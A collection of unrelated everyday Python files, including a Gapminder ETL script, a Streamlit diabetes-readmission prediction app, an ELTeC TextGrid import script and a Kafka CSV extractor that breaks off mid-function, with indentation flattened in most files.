COLUMN_TO_CONCEPT = {'Gini': 'gapminder_gini'}
def gen_datapoints(df_: pd.DataFrame):
df = df_.copy()
df = df.set_index(DIMENSIONS).drop('name', axis=1) # set index and drop column 'name'
for c in df:
yield (c, df[[c]])
def create_geo_domain(df: pd.DataFrame) -> pd.DataFrame:
return df[['geo', 'name']].drop_duplicates()
def main():
print('running etl...')
data = pd.read_excel(open_google_spreadsheet(DOCID), sheet_name=SHEET)
measures = list()
for c, df in gen_datapoints(data):
c_id = COLUMN_TO_CONCEPT[c]
df.columns = [c_id]
serve_datapoint(df, OUT_DIR, c_id)
measures.append((c_id, c))
measures_df = pd.DataFrame(measures, columns=['concept', 'name'])
measures_df['concept_type'] = 'measure'
dimensions_df = pd.DataFrame.from_dict(
dict(concept=DIMENSIONS,
name=list(map(str.title, DIMENSIONS)),
concept_type=['entity_domain', 'time'])
)
others_df = pd.DataFrame.from_dict(
dict(concept=['name'],
name=['name'],
concept_type=['string'])
)
(pd.concat([measures_df, dimensions_df, others_df], ignore_index=True)
.to_csv(osp.join(OUT_DIR, 'ddf--concepts.csv'), index=False))
geo_df = create_geo_domain(data)
geo_df.to_csv(osp.join(OUT_DIR, 'ddf--entities--geo.csv'), index=False)
# datapackage
dump_json(osp.join(OUT_DIR, 'datapackage.json'), get_datapackage(OUT_DIR, update=True))
if __name__ == '__main__':
main()
print('Done.')
|
"""
This is a web app created with Streamlit to host this project. Feel free to use this file as a guide or visit my
article on the topic (linked below).
"""
import streamlit as st
import pandas as pd
import numpy as np
import pickle
from PIL import Image
from sklearn.linear_model import LogisticRegressionCV
st.header("Predicting Diabetes Rehospitalizations")
st.write("""
Created by Aren Carpenter
This is a Streamlit web app created so users can explore my multiple logistic regression model predicting the need for
rehospitalization of diabetic patients based on a number of electronic health record (EHR) features.
This [data](https://data.world/uci/diabetes-130-us-hospitals-for-years-1999-2008) was collected from diabetic
patients from 1999 to 2008 and only includes inpatient hospitalizations lasting at least one day. There are about
100,000 observations.
Use the sidebar to select input features. Each feature defaults to its mean or mode, as appropriate.
""")
st.sidebar.header('User Input Features')
def user_input_features():
race = st.sidebar.selectbox('Race', ('Caucasian', 'AfricanAmerican', 'Hispanic', 'Other', 'Asian'))
gender = st.sidebar.selectbox('Gender', ('Female', 'Male'))
binned_age = st.sidebar.selectbox('Age Group', ('[0-30)', '[30-60)', '[60-100)'))
A1Cresult = st.sidebar.selectbox('HbA1c Test Result', ('None', 'Norm', '>7', '>8'))
A1C_test = st.sidebar.selectbox('Got HbA1c Test?', (0, 1))
change = st.sidebar.selectbox('Change in Meds?', (0, 1))
A1C_test_and_changed = st.sidebar.selectbox('Got HbA1c Test and Change in Meds?', (0, 1))
time_in_hospital = st.sidebar.slider('Days in Hospital', 1, 14, 4)
num_lab_procedures = st.sidebar.slider('Num of Lab Procedures', 1, 132, 44)
num_procedures = st.sidebar.slider('Num of Procedures', 0, 6, 2)
num_medications = st.sidebar.slider('Num of Medications', 1, 79, 16)
number_outpatient = st.sidebar.slider('Num of Outpatient Visits', 0, 36, 1)
number_emergency = st.sidebar.slider('Num of Emergency Visits', 0, 42, 0)
number_inpatient = st.sidebar.slider('Num of Inpatient Visits', 0, 12, 0)
number_diagnoses = st.sidebar.slider('Num of Diagnoses', 3, 16, 7)
admission_type_id = st.sidebar.selectbox('Admission Type', (1, 2, 3, 4, 5, 6, 7, 8))
discharge_disposition_id = st.sidebar.slider('Discharge Disposition', 1, 28, 4)
admission_source_id = st.sidebar.slider('Admission Source', 1, 25, 4)
max_glu_serum = st.sidebar.selectbox('Max Glucose Serum', ('None', 'Norm', '>200', '>300'))
metformin = st.sidebar.selectbox('Prescribed Metformin?', ('No', 'Steady', 'Up', 'Down'))
glipizide = st.sidebar.selectbox('Prescribed Glipizide?', ('No', 'Steady', 'Up', 'Down'))
glyburide = st.sidebar.selectbox('Prescribed Glyburide?', ('No', 'Steady', 'Up', 'Down'))
insulin = st.sidebar.selectbox('Prescribed Insulin?', ('No', 'Steady', 'Up', 'Down'))
diabetesMed = st.sidebar.selectbox('Taking Other Diabetes Med?', ('No', 'Yes'))
diabetes_as_diag_1 = st.sidebar.selectbox('Diabetes as #1 Diagnosis? (Select one)', (0,1))
diabetes_as_diag_2 = st.sidebar.selectbox('Diabetes as #2 Diagnosis? (Select one)', (0,1))
diabetes_as_diag_3 = st.sidebar.selectbox('Diabetes as #3 Diagnosis? (Select one)', (0,1))
data = {'time_in_hospital': time_in_hospital,
'num_lab_procedures': num_lab_procedures,
'num_procedures': num_procedures,
'num_medications': num_medications,
'number_outpatient': number_outpatient,
'number_emergency': number_emergency,
'number_inpatient': number_inpatient,
'number_diagnoses': number_diagnoses,
'admission_type_id': admission_type_id,
'discharge_disposition_id': discharge_disposition_id,
'admission_source_id': admission_source_id,
'change': change,
'A1C_test': A1C_test,
'A1C_test_and_changed': A1C_test_and_changed,
'diabetes_as_diag_1': diabetes_as_diag_1,
'diabetes_as_diag_2': diabetes_as_diag_2,
'diabetes_as_diag_3': diabetes_as_diag_3,
'race': race,
'gender': gender,
'max_glu_serum': max_glu_serum,
'A1Cresult': A1Cresult,
'metformin': metformin,
'glipizide': glipizide,
'glyburide': glyburide,
'insulin': insulin,
'diabetesMed': diabetesMed,
'binned_age': binned_age
}
features = pd.DataFrame(data, index=[0])
return features
input_df = user_input_features()
df = pd.read_csv('https://query.data.world/s/fzhdybgova7pqh6amwfzrnhumdc26t')
# Data Cleaning Steps
df.drop_duplicates(subset='patient_nbr', inplace=True)
df.drop(['encounter_id','patient_nbr','weight', 'payer_code', 'medical_specialty'], axis=1, inplace=True)
df = df[df.race != '?'] # about 1,000 obs
df = df[df.gender != 'Unknown/Invalid'] # 1 obs
df.readmitted.replace({'NO': 0, '<30': 1, '>30': 2}, inplace=True)
df = df[pd.to_numeric(df['diag_1'], errors='coerce').notnull()]
df = df[pd.to_numeric(df['diag_2'], errors='coerce').notnull()]
df = df[pd.to_numeric(df['diag_3'], errors='coerce').notnull()]
df.diag_1 = df.diag_1.astype('float64')
df.diag_2 = df.diag_2.astype('float64')
df.diag_3 = df.diag_3.astype('float64')
# Feature Engineering
df['A1C_test'] = np.where(df.A1Cresult == 'None', 0, 1)
df.change = np.where(df.change == 'No', 0, 1)
df['A1C_test_and_changed'] = np.where((df.change == 1) & (df.A1C_test == 1), 1, 0)
conditions = [
(df.age == '[0-10)') | (df.age == '[10-20)') | (df.age == '[20-30)'),
(df.age == '[30-40)') | (df.age == '[40-50)') | (df.age == '[50-60)'),
    (df.age == '[60-70)') | (df.age == '[70-80)') | (df.age == '[80-90)') | (df.age == '[90-100)')]
choices = [
'[0-30)',
    '[30-60)',
'[60-100)']
df['binned_age'] = np.select(conditions, choices, default=np.nan)
df = df[df.binned_age != 'nan']
df.drop(['age'], axis=1, inplace=True)
df['diabetes_as_diag_1'] = np.where((df.diag_1 >= 250) & (df.diag_1 <251), 1, 0)
df['diabetes_as_diag_2'] = np.where((df.diag_2 >= 250) & (df.diag_2 <251), 1, 0)
df['diabetes_as_diag_3'] = np.where((df.diag_3 >= 250) & (df.diag_3 <251), 1, 0)
df.drop(['diag_1', 'diag_2', 'diag_3'], axis=1, inplace=True)
meds_to_remove = ['repaglinide', 'nateglinide', 'chlorpropamide', 'glimepiride', 'acetohexamide', 'tolbutamide',
'pioglitazone', 'rosiglitazone', 'acarbose', 'miglitol', 'troglitazone', 'tolazamide', 'examide',
'citoglipton', 'glyburide-metformin', 'glipizide-metformin', 'glimepiride-pioglitazone',
'metformin-rosiglitazone', 'metformin-pioglitazone']
df.drop(meds_to_remove, axis=1, inplace=True)
X = df.drop('readmitted', axis = 1)
df = pd.concat([input_df, X], axis=0)
encode = ['race', 'gender', 'max_glu_serum', 'A1Cresult', 'metformin', 'glipizide', 'glyburide',
'insulin', 'diabetesMed', 'binned_age']
for col in encode:
dummy = pd.get_dummies(df[col], prefix=col)
df = pd.concat([df, dummy], axis=1)
del df[col]
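# Keep only the first row (the user input); the full dataset was concatenated
# above solely so that get_dummies produces the same encoded columns the
# trained model expects.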
df = df[:1]
#Write out input selection
st.subheader('User Input (Pandas DataFrame)')
st.write(df)
#Load in model
load_clf = pickle.load(open('diabetes_model.pkl', 'rb'))
# Apply model to make predictions
prediction = load_clf.predict(df)
prediction_proba = load_clf.predict_proba(df)
st.subheader('Prediction')
st.write("""
This is a multi-class classification model. Options are:
1) 'NO' --> this patient was not readmitted within a year,
2) '<30' --> this patient was readmitted within 30 days, or
3) '>30' --> this patient was readmitted after 30 days.
This generally corresponds to the severity of the patient's diabetes as well as the specific care, or lack thereof, during the visit.
""")
readmitted = np.array(['NO','<30','>30'])
st.write(readmitted[prediction])
st.subheader('Prediction Probability')
st.write("""
0 --> 'NO'
1 --> '<30'
2 --> '>30'
""")
st.write(prediction_proba)
st.subheader('Exploratory Data Analysis')
st.write("""
We identified some important features of the readmission rate that you can explore below. To begin, here is the distribution
of the classes in the original data set. We see that a majority of patients are not readmitted within a year. Patients that
are readmitted often have complications of their diabetes or issues with the specific care received.
""")
st.image(Image.open('Images/Readmit_rate.png'), width = 500)
st.write("""
Now looking at the patient population given the long-term blood sugar HbA1c test, we see only about 20% of patients received
this test, but, of those, 50% then had their medication changed and were less likely to be readmitted.
""")
st.image(Image.open('Images/HbA1c_test.png'), width = 500)
st.write("""
Finally, we see that age plays an important role. As expected, older patients have more complications due to their diabetes.
Age was binned according to this chart into 0-30, 30-60, and 60-100.
""")
st.image(Image.open('Images/Readmit_vs_age.png'), width = 500)
st.subheader('More Information')
st.write("""
For a deeper dive into the project, please visit the [repo on GitHub](https://github.com/ArenCarpenter/Diabetes_Hospitalizations)
where you can find all the code used in analysis, modeling, visualizations, etc. You can also read my
[articles](https://arencarpenter.medium.com/) in Towards Data Science on my other projects.
""")
|
#!/usr/bin/python3
class Square():
    """Square class with a private size attribute."""

    def __init__(self, size):
        """Initialize the square with the given size."""
        self.__size = size
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
{
'target_name': 'dir2_target',
'type': 'none',
'dependencies': [
'../dir1/dir1.gyp:dir1_target',
],
'actions': [
{
'inputs': [ ],
'outputs': [ '<(PRODUCT_DIR)/file.txt' ],
'action_name': 'Test action',
'action': ['cp', 'file.txt', '${BUILT_PRODUCTS_DIR}/file.txt' ],
},
],
},
],
}
|
#!/usr/bin/python
def numDivisors(n):
count = 0
j = 1
max = n
while j < max:
if n % j == 0:
count += 2
max = n / j
j += 1
return count
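# Example: numDivisors(28) == 6 (divisors: 1, 2, 4, 7, 14, 28).
# Caveat: perfect squares are over-counted by one, since their square root is
# effectively counted twice by the "count += 2" shortcut.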
i = 2
num = 1
while numDivisors(num) <= 500:
num += i
i += 1
print(num)
|
from eos import Fit, Ship, ModuleHigh, ModuleMed, ModuleLow, Rig, Implant, Drone, Charge, State, Skill
from ..eve_static_data.consts import CAT_SKILLS
from ..extensions import cache
from ..eve_static_data import eve_static_data_service
class PyfaEosService(object):
def build_high_module(self, type_id, state, charge_type_id):
return self._build_module(ModuleHigh, type_id, state, charge_type_id)
def build_mid_module(self, type_id, state, charge_type_id):
return self._build_module(ModuleMed, type_id, state, charge_type_id)
def build_low_module(self, type_id, state, charge_type_id):
return self._build_module(ModuleLow, type_id, state, charge_type_id)
def _build_module(self, module_class, type_id, state, charge_type_id):
converted_state = self.convert_state(state)
if charge_type_id is not None:
charge = Charge(charge_type_id)
else:
charge = None
if converted_state is not None:
module = module_class(type_id, state=converted_state, charge=charge)
else:
module = module_class(type_id, charge=charge)
return module
@staticmethod
def build_rig(type_id):
return Rig(type_id)
@staticmethod
def build_implant(type_id):
return Implant(type_id)
def build_drone(self, type_id, state):
converted_state = self.convert_state(state)
if converted_state is not None:
drone = Drone(type_id, state=converted_state)
else:
drone = Drone(type_id)
return drone
@staticmethod
def build_ship(type_id):
return Ship(type_id)
@staticmethod
def convert_state(state):
if state is not None:
            if state == 'online':
                return State.online
            elif state == 'offline':
                return State.offline
            elif state == 'active':
                return State.active
            elif state == 'overload':
                return State.overload
return None
@staticmethod
def build_full_fit(ship, skills=None, highs=None, mids=None, lows=None, rigs=None, implants=None, drones=None):
fit = Fit()
fit.ship = ship
if skills is not None:
for skill in skills:
fit.skills.add(skill)
if highs is not None:
for hi in highs:
fit.modules.high.equip(hi)
if mids is not None:
for mid in mids:
fit.modules.med.equip(mid)
if lows is not None:
for lo in lows:
fit.modules.low.equip(lo)
if rigs is not None:
for rig in rigs:
fit.rigs.equip(rig)
if implants is not None:
for imp in implants:
fit.implants.add(imp)
if drones is not None:
for drone in drones:
fit.drones.add(drone)
return fit
@staticmethod
def build_skill(skill_id, level=5):
return Skill(skill_id, level)
@cache.memoize()
def build_all_v_character(self):
skills_category = CAT_SKILLS
skill_types = eve_static_data_service.get_types_by_category(skills_category)
return [self.build_skill(x.typeID) for x in skill_types]
pyfa_eos_service = PyfaEosService()
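# Hedged usage sketch (the type IDs below are placeholders, not real EVE type IDs):
#   ship = pyfa_eos_service.build_ship(12345)
#   gun = pyfa_eos_service.build_high_module(23456, state='active', charge_type_id=None)
#   fit = pyfa_eos_service.build_full_fit(ship, highs=[gun])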
|
import numpy
import os
import shutil
import random
"""
Write the image paths and their labels into a txt file.
"""
datapath = "D:/project/tensorflow-vgg/test_data"
labels = os.listdir(datapath)
filetxt = open("test_label.txt","w")
idx = -1
for dirpath,dirs,files in os.walk(datapath):
for file in files:
label = labels[idx]
one_hot_label = [1 if i == int(label) else 0 for i in range(len(labels))]
writepath = os.path.join(dirpath,file)
filetxt.write(writepath)
filetxt.write(' ')
filetxt.write(label)
filetxt.write('\n')
idx += 1
filetxt.close()
#"""
#Pick out the samples in dataset r5 that do not appear in the training data r20 and store them separately
#"""
def getairplane(filename):
airplane = filename[:filename.index('_')]
if 'A-10' in airplane:
idx1 = filename.index('-')
idx2 = filename[idx1+1:].index('-')
idx = idx1+idx2+1
airplane = airplane[:idx]
return airplane
def get_label_name(airplane):
    synset = "./synset.txt"  # maps each aircraft type to its label
synfile = open(synset,'r')
while 1:
line = synfile.readline()
if line == '':
print('not found the airplane')
exit()
(feiji,label) = line.split()
if airplane == feiji:
return label
def getpath(path,filename):
for dirpath,dirs,files in os.walk(path):
for file in files:
if file == filename:
dst = os.path.join(dirpath,file)
return dst
def getallimgname(datapath):
allname = []
for dirpath,dirs,files in os.walk(datapath):
for file in files:
            if file.endswith('bmp'):
allname.append(file)
return allname
#if __name__ == "__main__":
# datapath_r5 = "D:/project/airplane_data/dataset-r5/image"
# datapath_r20 = "D:/project/airplane_data/dataset-r20/img"
# savepath = "D:/project/tensorflow-vgg/test_data"
# for name in getallimgname(datapath_r5):
# r20names = getallimgname(datapath_r20)
# if name in r20names:
# continue
# airplane = getairplane(name)
# label = get_label_name(airplane)
# dst = os.path.join(savepath,label)
# if os.path.exists(dst) == False:
# os.makedirs(dst)
# dst = os.path.join(dst,name)
# src = getpath(datapath_r5,name)
# shutil.copy(src,dst)
#"""
#Split all images into a test set and a training set
#Image directory structure:
#|---0
#|——————xxx.jpeg
#|---1
#"""
#if __name__ =="__main__":
# root_dir = "D:/project/tensorflow-vgg/alldata"
# test_dir = "D:/project/tensorflow-vgg/test_data"
# train_dir = "D:/project/tensorflow-vgg/train_data"
# f = getallimgname(root_dir)
# random.shuffle(f)
# trainnum = int(len(f)/5*4)
# index = 0
# for i in f:
# airplane = getairplane(i)
# label = get_label_name(airplane)
# if (index < trainnum)== True :
# index +=1
# src = getpath(root_dir,i)
# dst = os.path.join(train_dir,label)
# if os.path.exists(dst) == False:
# os.makedirs(dst)
# dst = os.path.join(dst,i)
# shutil.copy(src,dst)
# else:
# index +=1
# src = getpath(root_dir,i)
# dst = os.path.join(test_dir,label)
# if os.path.exists(dst) == False:
# os.makedirs(dst)
# dst = os.path.join(dst,i)
# shutil.copy(src,dst)
|
class Solution(object):
def removeDuplicates(self, nums):
n = len(nums)
if n == 0:
return 0
k = nums[0]
count = 1
i = 1
delete = 0
while i+delete<n:
if nums[i] == k:
count += 1
else:
count = 1
k = nums[i]
if count>2:
nums.pop(i)
i -= 1
count-=1
delete += 1
i += 1
print(nums)
return len(nums)
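# Example: Solution().removeDuplicates([1, 1, 1, 2, 2, 3]) keeps each value at
# most twice, leaving nums == [1, 1, 2, 2, 3] and returning 5.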
|
#!/usr/bin/env python3
"""
Script for creating the various files required for import of data into
the TextGrid Repository.
The script requires the metadata file produced in the previous step and
the full XML-TEI files to be uploaded.
Usage: The only parameter you should need to adjust is the path
encoded in the variable "collection" to be worked on.
File preparation is done one language at a time.
Output: The script writes a collection of files to the output folder for
the language collection concerned.
Please send feedback to Christof at "schoech@uni-trier.de".
"""
# === Import statements ===
import os
import re
import glob
from os.path import join
from os.path import basename
import pandas as pd
from collections import Counter
import lxml.etree as ET
from bs4 import BeautifulSoup as soup
# === Files and folders ===
collection = "ELTeC-por"
level = "level1"
# === Helper functions ===
def read_metadatafile(metadatafile):
with open(metadatafile, "r", encoding="utf8") as infile:
metadata = pd.read_csv(infile, sep="\t", index_col="xmlid")
return metadata
def read_template(templateid):
templatefile = join("templates", templateid)
with open(templatefile, "r", encoding="utf8") as infile:
template = infile.read()
return template
def save_template(template, language, templatefile, outputlevel):
# saves all files
# outputlevel creates the correct folder directory for each file
new_folder = templatefile.split(".")[0]
new_folder = re.sub("-", "", new_folder)
outputlevel0 = "output"
col_folder = join("output", "ELTeC")
LLL_level = join("output", "ELTeC", language)
LLLNNN_level = join("output", "ELTeC", language, new_folder)
    # create the collection folders if they don't already exist
if not os.path.exists(col_folder):
os.makedirs(col_folder)
if not os.path.exists(LLL_level):
os.makedirs(LLL_level)
if outputlevel == 0:
path = outputlevel0
elif outputlevel == 1:
path = col_folder
elif outputlevel == 2:
path = LLL_level
elif outputlevel == 3:
if not os.path.exists(LLLNNN_level):
os.makedirs(LLLNNN_level)
path = LLLNNN_level
else:
print("Something went wrong with directories.")
with open(join(path, templatefile), "w", encoding="utf8") as outfile:
outfile.write(template)
def check_date(date):
    date = str(date)
    if len(date) >= 4 and date[:4].isdigit():
        notBefore = date[:4]
        if len(date) >= 9 and date[5:].isdigit():
            notAfter = date[5:]
        else:
            notAfter = notBefore
    else:
        notBefore = "NA"
        notAfter = "NA"
    if notBefore == notAfter:
        date = notBefore
    else:
        date = notBefore + "-" + notAfter
    return date, notBefore, notAfter
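# Examples (sketch): check_date("1880") returns ("1880", "1880", "1880");
# check_date("1871-1890") returns ("1871-1890", "1871", "1890"); anything that
# does not start with a four-digit year returns ("NA", "NA", "NA").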
# === Functions to fill template files: (Eltec-)collection files ===
def fill_collection(language, collection_files_list):
templatefile = "CCC.collection"
template = read_template(join(templatefile))
template = re.sub("CCC", "ELTeC", template)
template = re.sub('<ore:aggregates rdf:resource="ELTeC/-LLL.aggregation"/>', "", template)
# parses the file as bs4-object and fills in each rdf_resource, i.e. edition used
template = soup(template, "xml")
for col in collection_files_list:
rdf_tag = template.find({"rdf:Description"})
new_tag = template.new_tag("ore:aggregates")
new_tag.attrs["rdf:resource"] = "{}/{}".format("ELTeC", col)
new_tag.append("")
rdf_tag.append(new_tag)
template = template.prettify()
templatefile = re.sub("CCC", "ELTeC", templatefile)
# save file
save_template(str(template), language, templatefile, 0)
def fill_collection_meta(language):
templatefile = "CCC.collection.meta"
template = read_template(join(templatefile))
template = re.sub("CCC", "ELTeC", template)
templatefile = re.sub("CCC", "ELTeC", templatefile)
save_template(template, language, templatefile, 0)
# === Functions to fill template files: one per language ===
def fill_aggregation_meta(language):
templatefile = "-LLL.aggregation.meta"
template = read_template(join("CCC", templatefile))
template = re.sub("LLL", language, template)
templatefile = re.sub("LLL", language, templatefile)
save_template(template, language, templatefile, 1)
def fill_LLL_aggregation(language, aggregation_list):
# fills the LLL.aggregation-file using a list of all edition-files
    # Read the empty template-file
templatefile = "-LLL.aggregation"
template = read_template(join("CCC", templatefile))
# Changes filename and description-tag
templatefile = re.sub("LLL", language, templatefile)
template = re.sub('<rdf:Description rdf:about="-LLL.aggregation">',
'<rdf:Description rdf:about="-{}.aggregation">'.format(language), template)
# parses the file as bs4-object and fills in each rdf_resource, i.e. edition used
template = soup(template, "xml")
for ed in aggregation_list:
rdf_tag = template.find({"rdf:Description"})
new_tag = template.new_tag("ore:aggregates")
new_tag.attrs["rdf:resource"] = "{}/{}".format(language, ed)
new_tag.append("")
rdf_tag.append(new_tag)
template = template.prettify()
# save file
save_template(str(template), language, templatefile, 1)
# === Functions to fill template files: one per text ===
def get_metadata_information(xmlfile, metadata):
# identifier
if "_" in basename(xmlfile):
identifier= basename(xmlfile).split("_")[0]
else:
identifier= basename(xmlfile).split(".")[0]
# author
try:
author = metadata.loc[identifier, "author"]
    # if the xmlid doesn't match the filename, try to look it up
except KeyError:
        testid = re.search(r"\d+", basename(xmlfile).split("_")[0]).group(0)
for row in metadata.index:
if re.search(testid, row):
print("Please check id for validation")
identifier = row
author = metadata.loc[identifier, "author"]
# title
title = metadata.loc[identifier, "title"]
# first edition and print edition
firstedition = metadata.loc[identifier, "firstedition"]
    date, notBefore, notAfter = check_date(firstedition)
if date == "NA":
printedition = metadata.loc[identifier, "printedition"]
        date, notBefore, notAfter = check_date(printedition)
# authorid, i.e. viaf or gnd
authorid = str(metadata.loc[identifier, "authorid"])
if re.search("gnd", authorid) or re.search("viaf", authorid):
try:
authorid = re.sub(r' wikidata(.*?)$', "", authorid)
except TypeError:
authorid = str(authorid)
if re.search("viaf.org", authorid):
authorid = re.search("https://viaf.org/viaf/(.*?)/", authorid).group(1)
authorid = "viaf:" + authorid
elif re.search("d-nb.info/gnd", authorid):
authorid = re.search("http://d-nb.info/gnd/(.*?)", authorid).group(1)
authorid = "gnd:" + authorid
print(authorid)
else:
authorid = ""
# gender
gender = metadata.loc[identifier, "gender"]
# size
size = metadata.loc[identifier, "size"]
# reprints
reprints = metadata.loc[identifier, "reprints"]
# timeslot
timeslot = metadata.loc[identifier, "timeslot"]
    # publication place
pubPlace = metadata.loc[identifier, "pubplace"]
return identifier, author, title, date, notBefore, notAfter, authorid, gender, size, reprints, timeslot, pubPlace
def fill_LLLNNN_edition_meta(xmlfile, counter, language, author, title, date, authorid, pubPlace):
# Read the empty templatefile
templatefile = "LLLNNN.edition.meta"
template = read_template(join("CCC", "LLL", templatefile))
template = re.sub("LLL", language, template)
# Fill information into the template
template = re.sub("LLL", language, template)
template = re.sub("NNN", counter, template)
template = re.sub("#author#", author, template)
template = re.sub("#title#", title, template)
template = re.sub("#edition#", str(date), template)
template = re.sub("#place#", str(pubPlace), template)
if not authorid == "":
template = re.sub("#xxx#", authorid, template)
else:
template = re.sub(' id="#xxx#"', "", template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
# templatefile = join(language, templatefile)
# Save the individual, filled-in templatefile
save_template(template, language, templatefile, 2)
def fill_LLL_LLLNNN_edition(xmlfile, counter, language):
# Read the empty templatefile
templatefile = "LLLNNN.edition"
template = read_template(join("CCC", "LLL", templatefile))
# Fill information into the template
template = re.sub("LLL", language, template)
template = re.sub("NNN", counter, template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
# Save the individual, filled-in templatefile
save_template(template, language, templatefile, 2)
def fill_LLL_LLLNNN_xml(xmlfile, counter, language):
# get template-file-name
templatefile = "-LLLNNN.xml"
# read the xml-file
with open(xmlfile, "r", encoding="utf8") as infile:
template = infile.read()
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
# save xml-file
save_template(template, language, templatefile, 3)
def fill_LLL_LLLNNN_xml_meta(xmlfile, counter, language, title):
    # read the empty template-file
templatefile = "-LLLNNN.xml.meta"
template = read_template(join("CCC", "LLL", "LLLNNN", templatefile))
template = re.sub("#title#", title, template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
save_template(template, language, templatefile, 3)
def fill_LLL_LLLNNN_work(xmlfile, counter, language):
# read empty template-file
templatefile = "LLLNNN.work"
template = read_template(join("CCC", "LLL", "LLLNNN", templatefile))
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
save_template(template, language, templatefile, 3)
def fill_LLL_LLLNNN_work_meta(xmlfile, counter, language, author, title, date, notBefore, notAfter, gender, size, reprints, timeslot, authorid):
templatefile = "LLLNNN.work.meta"
template = read_template(join("CCC", "LLL", "LLLNNN", templatefile))
# Fill information into the template
template = re.sub("#author#", author, template)
template = re.sub("#title#", title, template)
template = re.sub("#notBEdition#", str(notBefore), template)
template = re.sub("#notAEdition#", str(notAfter), template)
template = re.sub("#edition#", str(date), template)
template = re.sub("#authorGender#", gender, template)
template = re.sub("#size#", size, template)
template = re.sub("#reprintCount#", str(reprints), template)
template = re.sub("#timeSlot#", timeslot, template)
if not authorid == "":
template = re.sub("#xxx#", authorid, template)
else:
template = re.sub(' id="#xxx#"', "", template)
# Adapt the templatefile's filename
templatefile = re.sub("LLL", language, templatefile)
templatefile = re.sub("NNN", counter, templatefile)
save_template(template, language, templatefile, 3)
# === Main ===
def main(collection, level):
language = collection[-3:].upper()
metadatafile = join("metadata", collection + ".tsv")
metadata = read_metadatafile(metadatafile)
xmlfiles = join("input", collection, level, "*.xml")
fill_collection_meta(language)
fill_aggregation_meta(language)
counter = 0
for xmlfile in glob.glob(xmlfiles):
counter += 1
counter = "{:03}".format(counter)
print(counter, basename(xmlfile))
identifier, author, title, date, notBefore, notAfter, authorid, gender, size, reprints, timeslot, pubPlace = get_metadata_information(xmlfile, metadata)
fill_LLLNNN_edition_meta(xmlfile, counter, language, author, title, date, authorid, pubPlace)
fill_LLL_LLLNNN_edition(xmlfile, counter, language)
fill_LLL_LLLNNN_xml(xmlfile, counter, language)
fill_LLL_LLLNNN_xml_meta(xmlfile, counter, language, title)
fill_LLL_LLLNNN_work(xmlfile, counter, language)
fill_LLL_LLLNNN_work_meta(xmlfile, counter, language, author, title, date, notBefore, notAfter, gender, size, reprints, timeslot, authorid)
counter = int(counter)
# creates a list of all current edition-files in folder output/LLL/*.edition
aggregation_files_list = []
aggregation_files_path = join("output", "ELTeC", language, "*.edition")
for file in glob.glob(aggregation_files_path):
aggregation_files_list.append(basename(file))
fill_LLL_aggregation(language, aggregation_files_list)
collection_files_list = []
collection_files_path = join("output", "ELTeC", "*.aggregation")
for file in glob.glob(collection_files_path):
collection_files_list.append(basename(file))
fill_collection(language, collection_files_list)
main(collection, level)
|
#!/usr/bin/env python
aTup = ('I', 'am', 'a', 'test', 'tuple')
res = ()
for i in range( len(aTup) ):
if i%2 == 0:
res += ( aTup[i], )
print res
|
"""treadmill.dirwatch tests"""
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'zq'
import sys
import yaml
import socket
import os
from kafka import KafkaProducer
from datetime import *
"""
kafka-broker-list: kafka100:9092
kafka-topic: demo
filepath : sample.csv
offset : 0
interval : 7
learning : 100
column : 1,2
url : http://localhost:8080/health
"""
yaml_filename = 'extract.yaml'
f = open(yaml_filename)
config = yaml.safe_load(f)
def refresh_yaml() :
with open(yaml_filename, 'w') as yaml_file:
yaml.dump(config, yaml_file, default_flow_style=False)
def get_column_by_max(filepath,learning = 0):
"""
returns normal number of columns by guess
"""
max_column = 0
num_line = 0
with open(filepath) as f:
for lines in f:
line = lines.rstrip('\n')
num_column = len(line.split(","))
max_column = num_column if num_column > max_column else max_column
num_line +=1
if num_line > learning :
break
return max_column
def get_column_by_score(filepath,offset = 0 , learning = 1):
"""
returns normal number of columns by guess
"""
score = {}
num_line = 0
with open(filepath) as f:
f.seek(offset)
for lines in f:
line = lines.rstrip('\n')
num_column = len(line.split(","))
print(" num_column %s " % num_column)
key = num_column
if key not in score :
score[key] = 1
else :
count = score[key]
count += 1
score[key] = count
num_line +=1
if num_line > learning :
break
column_score = 0
max_score = 0
for (k,v) in score.items() :
if v > max_score :
max_score = v
column_score = int(k)
return column_score
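# Example (sketch): for a CSV whose first lines are "1,2,3", "1,2,3" and "4,5",
# get_column_by_score(path, learning=2) tallies {3: 2, 2: 1} and returns 3.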
def request(data):
print(data)
def get_error_path(fin_path) :
return '$' + fin_path
def get_fout_path(fin_path) :
return '_'+ fin_path
def get_final_ok_path(fin_path) :
return 'ok_'+ fin_path
def get_final_error_path(fin_path) :
return 'error_'+fin_path
def rename(source_filename,target_filename) :
if os.path.exists(target_filename) and os.path.isfile(target_filename):
os.remove(target_filename)
os.rename(source_filename,target_filename)
def error(fin_path,error_path,final_error_path,error_number) :
if error_number > 1 :
final_error_path = get_final_error_path(fin_path)
rename(error_path,final_error_path)
else :
os.remove(error_path)
def get_kafka_brokerlist() :
return config['kafka-broker-list']
def get_kafka_topic() :
return config['kafka-topic']
def extract(fin_path,offset = 0,interval = 10000 , recommend = 1):
line_number = 0
error_number = 0
current_offset = offset
fout_path = get_fout_path(fin_path)
error_path = get_error_path(fin_path)
with open(fin_path) as fin,open(fout_path, "a") as fout, \
open(error_path,'a') as ferror:
fin.seek(offset)
for raw_line in fin:
current_offset += len(raw_line)
config['offset'] = current_offset
print("offset : %s" % current_offset)
line = raw_line.rstrip('\n')
num_column = len(line.split(","))
if num_column >= recommend :
fout.write(raw_line)
else:
error_number += 1
ferror.write(raw_line)
if line_number < interval :
line_number += 1
else :
refresh_yaml()
line_number = 0
rename(fout_path,get_final_ok_path(fin_path))
error(fin_path,error_path,get_final_error_path(fin_path),error_number)
def extract_to_kafka(fin_path,offset = 0,interval = 10000 , recommend = 1) :
line_number = 0
error_number = 0
current_offset = offset
fout_path = get_fout_path(fin_path)
